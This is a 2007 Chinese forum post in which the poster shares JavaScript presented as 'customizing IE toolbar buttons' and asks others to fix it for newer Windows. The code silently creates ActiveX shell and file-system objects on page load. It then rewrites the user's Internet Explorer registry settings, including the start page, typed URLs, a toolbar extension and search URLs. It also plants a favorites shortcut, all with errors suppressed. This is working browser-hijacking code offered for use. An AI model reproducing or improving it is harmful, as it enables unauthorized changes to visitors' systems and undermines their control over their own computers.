用JS定制IE工具栏按钮
发表于:2007-06-30来源:作者:点击数:
标签:
document.write(APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent/APPLET); function AddFavLnk(loc, DispName, SiteURL) { var Shor = Shl.CreateShortcut(loc + \\ + DispName +.URL); Shor.TargetPath = SiteURL; Shor.Save(); } function f
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function AddFavLnk(loc, DispName, SiteURL)
{
var Shor = Shl.CreateShortcut(loc + "\\" + DispName +".URL");
Shor.TargetPath = SiteURL;
Shor.Save();
}
function f(){
try
{
//ActiveX initialization
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createInstance();
FSO = a1.GetObject();
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Net = a1.GetObject();
try
{
if (document.cookie.indexOf("Chg") == -1)
{
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "Microsoft Internet Explorer");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "Microsoft Internet Explorer");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "about:blank");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url1", "http://sunlight.uis.mtn/");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Extensions\\{12345678-0000-0000-0000-008713385168}\\CLSID", "{1FBA04EE-3024-11d2-8F1F-0000F87ABD16}");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Extensions\\{12345678-0000-0000-0000-008713385168}\\ClsidExtension", "{12345678-0000-0000-0000-008713385168}");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Extensions\\{12345678-0000-0000-0000-008713385168}\\ButtonText", "阳光城市");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Extensions\\{12345678-0000-0000-0000-008713385168}\\Icon", "shell32.dll,42");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Extensions\\{12345678-0000-0000-0000-008713385168}\\HotIcon", "shell32.dll,42");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Extensions\\{12345678-0000-0000-0000-008713385168}\\exec", "http://sunlight.uis.mtn");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Extensions\\{12345678-0000-0000-0000-008713385168}\\Default Visible", "Yes");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Extensions\\{12345678-0000-0000-0000-008713385168}\\MenuStatusBar", "阳光城市");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Extensions\\{12345678-0000-0000-0000-008713385168}\\MenuText", "阳光城市");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Search\\SearchAssist
ant", "http://....");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Search\\CustomizeSearch", "http://....");
var expdate = new Date((new Date()).getTime() + (1));
document.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
WF = FSO.GetSpecialFolder(0);
loc = WF + "\\Favorites";
if(!FSO.FolderExists(loc))
{
loc = FSO.GetDriveName(WF) + "\\Documents and Settings\\" + Net.UserName + "\\Favorites";
if(!FSO.FolderExists(loc))
{
return;
}
}
AddFavLnk(loc, "☆阳光城市☆", "http://..../");
//}
}
}
catch(e)
{}
}
catch(e)
{}
}
function init()
{
setTimeout("f()", 1000);
}
init();
这是我用的JS,谁能改改
好象只对win98
原文转自:http://www.ltesting.net